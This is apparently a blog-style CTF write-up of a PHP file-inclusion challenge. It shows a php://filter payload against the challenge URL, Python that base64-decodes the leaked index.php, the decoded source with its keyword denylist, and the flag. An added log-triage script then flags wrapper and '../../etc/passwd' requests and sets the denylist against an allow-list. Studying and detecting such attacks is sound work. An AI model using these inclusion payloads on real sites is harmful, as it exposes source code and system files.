醉梦半醒's Blog

filter - File Inclusion

2018/07/15

Example challenge: http://4.chinalover.sinaapp.com/web7/index.php

Reference: https://blog.csdn.net/qq_35544379/article/details/78230629

I found a file inclusion through the GET parameter `file`, but how do you get the flag? I just couldn't figure it out.

So I quietly searched for a write-up.

The payload is http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

This returns index.php base64-encoded.

Decode it in Python:

import base64

# s is the base64 text returned by the php://filter request above
s="PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4="
r = base64.b64decode(s)  # raw bytes of the original index.php
print(r)


The result is:

b'<html>\n    <title>asdf</title>\n    \n<?php\n\terror_reporting(0);\n\tif(!$_GET[file]){echo \'<a href="./index.php?file=show.php">click me? no</a>\';}\n\t$file=$_GET[\'file\'];\n\tif(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){\n\t\techo "Oh no!";\n\t\texit();\n\t}\n\tinclude($file); \n//flag:nctf{edulcni_elif_lacol_si_siht}\n\n?>\n</html>'
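An added example, not from the original post: a Python triage of constructed access-log lines that pulls out the `file` parameter, flags any stream-wrapper prefix such as `php://`, and contrasts the substring denylist from the decoded index.php with an allow-list of permitted filenames (the allow-list contents are an assumption).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the original post): a normal request,
# the post's payload, the same wrapper percent-encoded, and a traversal attempt.
LOG_LINES = [
    '10.0.0.5 - - [15/Jul/2018:10:01:02 +0800] "GET /web7/index.php?file=show.php HTTP/1.1" 200 312',
    '10.0.0.5 - - [15/Jul/2018:10:01:09 +0800] "GET /web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 894',
    '10.0.0.7 - - [15/Jul/2018:10:02:30 +0800] "GET /web7/index.php?file=php%3A%2F%2Ffilter%2Fresource%3Dindex.php HTTP/1.1" 200 880',
    '10.0.0.9 - - [15/Jul/2018:10:03:00 +0800] "GET /web7/index.php?file=../../etc/passwd HTTP/1.1" 200 7',
]

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A plain local include path never begins with "scheme:"; that prefix means a PHP stream wrapper.
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*:', re.I)
# Hypothetical allow-list of the only files the page is meant to include.
ALLOWED_INCLUDES = {"show.php", "index.php"}

def extract_file_param(log_line):
    """Return the percent-decoded ?file= value of a log line, or None."""
    m = REQ_RE.search(log_line)
    if not m:
        return None
    values = parse_qs(urlsplit(m.group(1)).query).get("file")
    return values[0] if values else None

def challenge_denylist_blocks(value):
    """The check in the decoded index.php, transcribed: strstr() is case-sensitive, stristr() is not."""
    low = value.lower()
    return "../" in value or "tp" in low or "input" in low or "data" in low

def allowlist_accepts(value):
    """The fix: match known filenames exactly instead of hunting substrings."""
    return value in ALLOWED_INCLUDES

def triage(lines):
    """Per request: the file value, whether a wrapper was used, and how each check judges it."""
    rows = []
    for line in lines:
        value = extract_file_param(line)
        if value is None:
            continue
        rows.append({
            "file": value,
            "wrapper": bool(WRAPPER_RE.match(value)),
            "denylist_blocks": challenge_denylist_blocks(value),
            "allowlist_accepts": allowlist_accepts(value),
        })
    return rows
```

Running `triage(LOG_LINES)` shows the denylist passes both wrapper requests while the allow-list rejects everything except `show.php`, which is the signal to alert on.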
